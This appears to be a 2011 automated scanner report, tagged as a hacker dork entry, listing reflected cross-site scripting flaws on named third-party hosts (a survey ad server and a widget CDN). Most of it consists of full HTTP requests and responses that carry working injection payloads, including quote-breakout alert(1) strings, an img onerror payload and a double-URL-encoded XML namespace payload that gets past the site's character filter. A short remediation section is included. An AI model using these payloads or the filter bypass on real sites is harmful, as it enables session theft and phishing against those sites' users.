XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09032011-02

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://amch.questionmarket.com/adscgen/d_layer.php [lang parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/d_layer.php

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d05d9'%3balert(1)//d371a7b68b8 was submitted in the lang parameter. This input was echoed as d05d9';alert(1)//d371a7b68b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=920737&lang=d05d9'%3balert(1)//d371a7b68b8&from_node=29569&site=2 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; linkjumptest=1; LP=1315138435

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:43 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Content-Type: text/html
Content-Length: 12153

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
eyClickthru = 1;
}
   DL_Close(false);

window.top.location.href='http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=920737&from_node=29569&site=2&frame=&lang=d05d9';alert(1)//d371a7b68b8&dl_logo=&invite=no&link='+escape(window.location.href)+'&orig='+escape(window.location.href);
}

function DL_Close(adscout) {
   if (typeof adscout == 'undefined' || adscout == true) {
       DL_Adscout(adsc
...[SNIP]...

1.2. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/d_layer.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fe81"%3balert(1)//c8cdb981c7e was submitted in the site parameter. This input was echoed as 8fe81";alert(1)//c8cdb981c7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=920737&lang=&from_node=29569&site=28fe81"%3balert(1)//c8cdb981c7e HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; linkjumptest=1; LP=1315138435

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:48 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Content-Type: text/html
Content-Length: 12181

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
t);
   }
   // Set a flag so animation loop will stop running
   DL_ScrollState = 2;
   DL_Scroll();
}

function DL_Adscout(adscout) {
   (new Image).src="//amch.questionmarket.com/adscgen/adscout_dc.php?site=28fe81";alert(1)//c8cdb981c7e&code=&survey_num=920737&ord="+Math.floor((new Date()).getTime());
}

function DL_Add(){
   DL_InsertSwf();
}

function DL_FlashInstalled() {
   // Detect swf plugin.

   var result = false;
   if (navigator.m
...[SNIP]...

1.3. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/d_layer.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99db6'%3balert(1)//7d7773fe9e8 was submitted in the site parameter. This input was echoed as 99db6';alert(1)//7d7773fe9e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=920737&lang=&from_node=29569&site=299db6'%3balert(1)//7d7773fe9e8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; linkjumptest=1; LP=1315138435

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:48 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Content-Type: text/html
Content-Length: 12181

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...

   DL_SurveyClickthru = 1;
}
   DL_Close(false);

window.top.location.href='http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=920737&from_node=29569&site=299db6';alert(1)//7d7773fe9e8&frame=&lang=&dl_logo=&invite=no&link='+escape(window.location.href)+'&orig='+escape(window.location.href);
}

function DL_Close(adscout) {
   if (typeof adscout == 'undefined' || adscout == true) {
       DL
...[SNIP]...

1.4. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/dynamiclink.js.php

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85199'-alert(1)-'3cdbb99b00a was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=920737&lang=85199'-alert(1)-'3cdbb99b00a&from_node=29569&site=2 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:55 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: LP=1315138675; expires=Thu, 08 Sep 2011 16:17:55 GMT; path=/; domain=.questionmarket.com
Content-Length: 2472
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
}
df=biggestframe;
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=920737&lang=85199'-alert(1)-'3cdbb99b00a&from_node=29569&site=2';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e)
...[SNIP]...

1.5. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/dynamiclink.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5593a'-alert(1)-'c198000a41b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=920737&lang=&from_node=29569&site=2&5593a'-alert(1)-'c198000a41b=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:18:27 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: LP=1315138707; expires=Thu, 08 Sep 2011 16:18:27 GMT; path=/; domain=.questionmarket.com
Content-Length: 2475
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...

d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=920737&lang=&from_node=29569&site=2&5593a'-alert(1)-'c198000a41b=1';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e) {}
dle.type="text/jav
...[SNIP]...

1.6. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/dynamiclink.js.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5df1f'-alert(1)-'e9ed9649ab5 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=920737&lang=&from_node=29569&site=25df1f'-alert(1)-'e9ed9649ab5 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:18:07 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Set-Cookie: LP=1315138687; expires=Thu, 08 Sep 2011 16:18:07 GMT; path=/; domain=.questionmarket.com
Content-Length: 2474
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=920737&lang=&from_node=29569&site=25df1f'-alert(1)-'e9ed9649ab5';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e) {}
dle.type="text/javas
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/json/i/d8f94c34-6faa-457d-a8f4-cd076a3d47a2/iv/32/p/3/r/281404f0-ed39-48e6-b126-8b7c6b815cc4/rv/48/t/b8bff2cba70830bda8543e310a09cff0f90a701a000001322ded828c/u/3/

Issue detail

The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 1d748<img%20src%3da%20onerror%3dalert(1)>9663c0e65cc was submitted in the REST URL parameter 14. This input was echoed as 1d748<img src=a onerror=alert(1)>9663c0e65cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/d8f94c34-6faa-457d-a8f4-cd076a3d47a2/iv/32/p/3/r/281404f0-ed39-48e6-b126-8b7c6b815cc4/rv/48/t/b8bff2cba70830bda8543e310a09cff0f90a701a000001322ded828c1d748<img%20src%3da%20onerror%3dalert(1)>9663c0e65cc/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 04 Sep 2011 12:19:21 GMT
Expires: Wed, 07 Sep 2011 12:18:21 GMT
ObjectVersions: [Inst: req 32, db 32]; [Reg: req 48, db 48];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web04
Content-Length: 8141

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"enabledState":"0","initParams":"var_footer5_clickthrough=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B244027945%3B58778952%3Bb%3Bpc%3D%5BTPAS_ID
...[SNIP]...
s":false,"isAdEnabled":false,"adPlacement":"TL","categories":"","thumbFilePath":"/thumbs/281404f0-ed39-48e6-b126-8b7c6b815cc4.png?48"}],"token":"b8bff2cba70830bda8543e310a09cff0f90a701a000001322ded828c1d748<img src=a onerror=alert(1)>9663c0e65cc"});

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
Path:	/syndication/json/i/d8f94c34-6faa-457d-a8f4-cd076a3d47a2/iv/32/p/3/r/281404f0-ed39-48e6-b126-8b7c6b815cc4/rv/48/t/b8bff2cba70830bda8543e310a09cff0f90a701a000001322ded828c/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 885f1<a>a131058bd22 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/d8f94c34-6faa-457d-a8f4-cd076a3d47a2885f1<a>a131058bd22/iv/32/p/3/r/281404f0-ed39-48e6-b126-8b7c6b815cc4/rv/48/t/b8bff2cba70830bda8543e310a09cff0f90a701a000001322ded828c/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 04 Sep 2011 12:18:12 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web15
Content-Length: 1190

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"d8f94c34-6faa-457d-a8f4-cd076a3d47a2885f1<a>a131058bd22","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/386eaecb-7c1a-4679-9118-996ea5217907/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/cb12e89655871f8e7e784dc0c08f77700c4560e6000001322d93b7f5/u/3/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload d769a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efc719fe9e6e was submitted in the REST URL parameter 18. This input was echoed as d769a<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>fc719fe9e6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /syndication/xml/i/386eaecb-7c1a-4679-9118-996ea5217907/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/cb12e89655871f8e7e784dc0c08f77700c4560e6000001322d93b7f5d769a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efc719fe9e6e/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:22:33 GMT
Expires: Wed, 07 Sep 2011 12:21:33 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 3473

<response><widgets><widget><token>cb12e89655871f8e7e784dc0c08f77700c4560e6000001322d93b7f5d769a<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>fc719fe9e6e</token><app-id>386ea
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/386eaecb-7c1a-4679-9118-996ea5217907/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/cb12e89655871f8e7e784dc0c08f77700c4560e6000001322d93b7f5/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload af0ec<a>5f02f560c70 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/386eaecb-7c1a-4679-9118-996ea5217907af0ec<a>5f02f560c70/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/cb12e89655871f8e7e784dc0c08f77700c4560e6000001322d93b7f5/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:21:17 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web15
Content-Length: 1696

<response><widgets><widget><token>cb12e89655871f8e7e784dc0c08f77700c4560e6000001322d93b7f5</token><app-id>386eaecb-7c1a-4679-9118-996ea5217907af0ec<a>5f02f560c70</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/50c75bf0-9bd2-4e0d-b0e2-50ade412a01b/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd/u/3/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 720ea%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ec4be2c3bd51 was submitted in the REST URL parameter 18. This input was echoed as 720ea<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>c4be2c3bd51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Request

GET /syndication/xml/i/50c75bf0-9bd2-4e0d-b0e2-50ade412a01b/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd720ea%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ec4be2c3bd51/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:24:07 GMT
Expires: Wed, 07 Sep 2011 12:23:07 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web01
Content-Length: 3473

<response><widgets><widget><token>ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd720ea<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>c4be2c3bd51</token><app-id>50c75
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
